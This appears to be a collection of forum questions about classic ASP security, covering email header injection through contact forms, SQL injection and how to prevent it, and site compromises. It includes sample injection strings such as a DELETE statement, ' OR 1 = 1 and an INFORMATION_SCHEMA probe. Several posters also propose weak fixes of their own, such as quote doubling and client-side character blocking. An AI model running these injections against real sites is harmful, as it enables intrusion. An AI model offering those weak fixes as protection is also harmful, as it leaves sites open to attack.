Email Injection
I have feedback forms on several of my sites and recently, they have been plagued with email injection attacks.
The forms are pretty straight-forward. Half a dozen fields get submitted to a formhandler.asp page where the contents are sent to some hard-coded email addresses using ASPmail.
From what I understand about how this works, spambots are used to add carriage returns after some of the form fields and then adding BCCs in to use the form to send out spam to other addresses. Here's an example of the emails I'm getting: .....
To sanitise the input from a form before it gets sent as an email, is it simply a matter of
Replace(Request.Form("formName"), "'", "''")
or is there more to it than that?
Recently our contact forms on the website have been receiving messages with html links in the text entry fields. I'm assuming that a bot or something is using my mail script and bypassing the contact form.
I have seen posts about most other mail scripts in PHP that say the bots are injecting their own header information and effectively writing the message to their own BCC list.
Does someone have a thread out there about this, and what can I do to keep people from sending HTML links through my forms to their own list? How do I check to see if they're successful, or if I'm just getting a bunch of tests hitting the form and the messages are only coming to me, the specified recipient?
I recently built a login page and a friend of mine was working on something similar and said that I need to protect the login from SQL injection. I am not really sure what exactly that is. I think I have a rough idea but can someone explain it to me?
In addition, I will need to obviously protect what I built and am not sure how to go about doing that either.
If anybody has a list of dodgy characters that can be used for SQL injection attacks so that I can figure out a way to strip them from user inputs?
Also, if somebody was filling in a form that inserts into a "memo" field in Access, could this be used to launch such an attack, or would whatever they type simply be inserted into the field? I hope that bit is clear.
I have a form field "message" which is a multi-line text box. If someone typed into that box
DELETE * FROM Messages WHERE MessageID =1205
or some other command, would that simply be inserted into the database, or would the server try to execute the command?
I have heard a lot about SQL Injection. I was wondering how does an injector come to know about the table/column name when they cannot see the asp codes in a website?
How do I test for SQL injection?
Do I do a SELECT statement in my username login?
I just wanted to share it with you guys and ask your opinions. Code:
Is it possible to "intercept" all calls to conn.execute and have them go to
a checking routine that will either let the command go through or terminate
it if it contains some illegal instructions? My client's company has had its
hacker free status revoked due to the possibility of sql injection. I could
put a function before every single conn.execute but we have hundreds of
them. Just wondering if there is some way of telling it to do something else
first. Maybe I can redefine conn.execute somehow?
I have written several site functions to hopefully prevent against cross-site hacking, SQL injection, and URL encoding. I also have a symmetric key encryption that is pretty basic (which isn't posted here and is total overkill). I was wondering if these functions are protecting well enough, or am I missing some tests?
Function InjFix(val)
InjFix=SEncode(Trim(Replace(val,"'","''")))
end Function
Function SEncode(val)
SEncode=Server.HtmlEncode(val)
end Function
Function URLEncode(val)
URLEncode=Server.URLEncode(val)
end Function
I am using the method below to make sure that the query isNumeric and not longer than 4. It's a little snippet I found in another post... It works fine but I'm questioning whether it's enough.
URLs like this, itemdetail.asp?-=#&ItemID=906, don't throw any errors because the "ItemID=906" is fine. Does the method used below really protect against SQL Injections in this case?
Code: ....
Anyone got some good methods for preventing html-injection in ASP?
I have always validated user input to pieces prior to integrating it into a SQL statement, in order to avoid SQL Injection attacks. A colleague of mine told me that binding my vars would make them SQL scalar, but I have been left in the dark as to HOW... The web left me none the wiser, as well, so here goes: Anyone got a brief example of binding vars in ASP to get me started?
I believe someone is using my contact form and sending out spam. I'm getting thousands of undeliverable emails.
I don't know anything about ASP. Someone who used to work here wrote the form processing script and it seems that all the forms on different domains are being processed by this script. It seems like they didn't do any sort of validation or checks, and on one website there are hundreds of pages with the contact form. I could do it in PHP but that is way too much work.....
I have just started a new job and I'm in charge of the databases at a college. We have a web page that the students can access to see their profile and course details, which is causing problems.
The students have to log in to an e-learning site called Moodle, which is fine (Moodle is all written in PHP). They can from there just browse Moodle, which has news and a message board etc. They can then also click a link to their profile; it is then directed to an ASP page, but it uses their login details from the PHP Moodle site to retrieve their details from the database and display them on the ASP web page.
THE FOLLOWING IS A CODE EXTRACT....
I have a multi-page ASP web application that uses information sent to it from the client in the Request.Forms collection, the Request.QueryString collection and the Request.Cookie collection.
What I want to do is to sanitise ALL the information sent to EVERY page.
I thought I'd achieve this by having an INCLUDE file inserted at the top of EVERY page.
This include file iterates through EVERY form, querystring and cookie item and removes anything that looks like malicious SQL injections from the values. Having completed this task, the many web pages then access the sanitised Request object with impunity.
One minor drawback is that it doesn't seem to work... I can't update the Request object with the sanitised value. [Error message: VBScript runtime error: Object doesn't support this property or method]
Either it's something silly in my coding or it's the wrong approach....please advise accordingly (code below).....
Can anyone find fault with this code? I wrote it in hopes of preventing users from "breaking" SQL queries and getting places they shouldn't by using SQL Injections.
Code: ....
I have been given a site to redo. In the process of looking at the code, the live site is open to SQL injection. I know what needs to be done but have limited time right now to redo it correctly. In the interim, while I am rewriting the site, will adding a few lines of code as below prevent SQL injection until I have the time to rebuild the functions and move to stored procedures?
Basically, client side I added an onKeypress JavaScript routine to look for ' or " and disallow them in login fields ....
I have been working on this particular project for a little over 2 weeks now. This product contains between 700-900 stored procedures to handle just about all you can imagine within the product. I just personally rewrote/reformatted close to 150 of them myself. Nothing too fancy, mostly a lot of formatting. We have a little down time between Q/A and fixing any bugs they find, so I decided to test the security of the site with Cross-Site Scripting and SQL injection. Because SP's are used in pretty much every aspect of the site, the site isn't vulnerable to the simple injection stuff like ' OR 1 = 1. Instead I've had to try several things which I will get to in a minute. As I have access to all of these SP's and the DB in which they reside, I could easily look at the code and determine what variables are needed to pass in. I've been trying to break the site to give up a database name so I can proceed to check the system tables etc. etc. - much like a regular hacker would (meaning not cheating by looking at the code). So, I've started my attack by downloading a local version of the login page, changing a few variables and injecting something like:
'SELECT * FROM INFORMATION_SCHEMA.TABLES
Initially, the statement is passed into the form fields and won't return anything other than a JS popup error. I altered the statement intentionally to break the page
SELECT * FROM INFORMATION_SCHEMA.TA'
and it produces an error giving me the name of the query and its location. When I plug the name of the query into the URL, i.e. http://theurl.com/query_folder/query_name/, it fires me off to another folder containing an include file of some sort. When I run that include it gives me the name of a pretty important variable. Apparently it's a variable that determines what DB I should point to.
Now, one of the issues I have is that everything is a stored procedure so trying to hack it is a little more difficult ....
Can anyone help me with an ASP function to perform the following:
Series of page like this
item.asp?ItemId=2345
news.asp?NewsId=23456
Sale.asp?SaleId=344444
I need a function I can include in lots of pages that basically says
if query string is "ItemId" then only allow numerics of a maximum of 4
if query string is "NewsId" then only allow numerics of a maximum of 5
if query string is "SaleId" then only allow numerics of a maximum of 6
In all of the above query strings of 1,2,3 etc numerals must also work.
Any help appreciated as I'm in deep "poop" battling Chinese hackers.
I created an ISAPI dll application to prevent SQL Injection attempts by
intercepting the HTTP requests and sanitizing both GET and POST variables (or
any combination of both) before the request reaches the intended code. This
is especially useful for legacy applications not designed to deal with MS SQL
Server Injection attempts. Though this application was designed with MS SQL
Server in mind, it can be used with no or minimal changes with other database
engines.
This ISAPI is only compatible with Internet Information Server (IIS) 6.0
which comes with Windows 2003. Windows XP uses IIS 5 engine which DOES NOT
support ISAPI Wildcard.
One of my servers has been compromised by this virus, and I can't seem to
block it out! I have shut down the infected server, but I need to figure
out how to check for this, and stop it.
The site is running iis5 on Windows2000, the backend DB is SQLServer 2000
Can anyone point me to some good resources for this? Code:
We log hundreds of SQL injection attempts per day -- the type with
CAST(0x44004500... AS VARCHAR(4000)). It amuses me that the last thing the
attack does is DEALLOCATE its cursor. My SQL Server DBA tells me this makes
no difference. So...
Are these hackers cargo cultists? Or am I missing something?
I use dynamic SQL queries in my sites. I know this is bad, but I grew up using Access as a data source and learned bad habits.
One of my MsSQL Server databases has just been hacked, despite me stripping common words/punctuation from the SQL statements - which I thought would prevent injection attack.
What I currently do is this (using three functions to strip out HTML, quotation marks and T-SQL code)
Code: .....
My client received an email from a user who mentioned that by accident they had been typing (over the querystring I guess), and the url had become:
default.asp?pageid='asd
They then received a SQL Server error message.
My client contacted their webhost, who came back to them promptly and talked of 'SQL Injection'. They said that we would need to secure the code as well as the permissions on the database (which I believe they have done).
This is something I had overlooked, and started to write a fix for a couple of nights ago... but I don't think it's 100%....
Basically I now do this at the top of my default.asp page ...
Is SQL injection an issue with SP's?
I am working on an ecommerce app and want to be able to take my entire POST results as one item (or iterate through them) and check for any malicious SQL INJECTION items. After checking/escaping them I want to save them back into the post results. The reason for this is that I have coded the entire app and just learned about the dangers of SQL Injection, and rather than going through every post var and fixing it I would rather run a function at the beginning of each page.
I've seen plenty of articles and utilities for preventing form injections for ASP.NET, but not too much for classic ASP. Are there any good input validation scripts that you use to avoid form injection attacks? I'm looking for good routines I can reuse on all of my form processing pages.
This is weird, I'm pretty familiar with SQL Injection - but we're getting these weird injections that are writing in the default document or home page. What it's doing is putting in script code at the top or bottom of the home page... it looks something like this:
What it's doing is decoding itself into an iframe that links out to popups that will try to download a virus on your machine. I don't get the popup on my machine because I think I have a newer version of IE. But some people have complained that it is installing a virus on their machine.
Also what is crazy is when I replace the file with a good version. In about 30 mins, it is automatically overwritten with the infected version. Also I've noticed it on some other websites that I haven't touched.
Has anyone encountered this before? Because I'm stumped as to the cause of it. I don't see the issue on our dev server. It seems to be IIS on a shared host.
I'm running a simple mail system program which emails newsletters to a database list of 3000+ users.
The program loops through a database containing the emails and sends them out using ASPEmail.
My question is, is there some way I can validate each email address so that if there are invalid characters, e.g. the space in "blah @blah.com",
it will skip the record and continue the loop?
At the moment I have a working program; however, whenever the program comes across an invalid email address it stops at that record and prevents the program from emailing any further.
I am having a problem formatting an email message which comes from a form.
I am currently having difficulty with the <br> tag which I am using for line spaces within my email. I am getting an expected statement error message which is pointing to the line which is underlined below. I can't think what is causing this.
The code for my processing page is below:-
1. I want users to type in their email address on a textfield, and after users press the "Submit" button. The info will automatically go to another person's email to receive a compliment, suggestion, etcetera.
2. Another is how to include the message written on a textarea of a form with the ASP code supplied below: Code: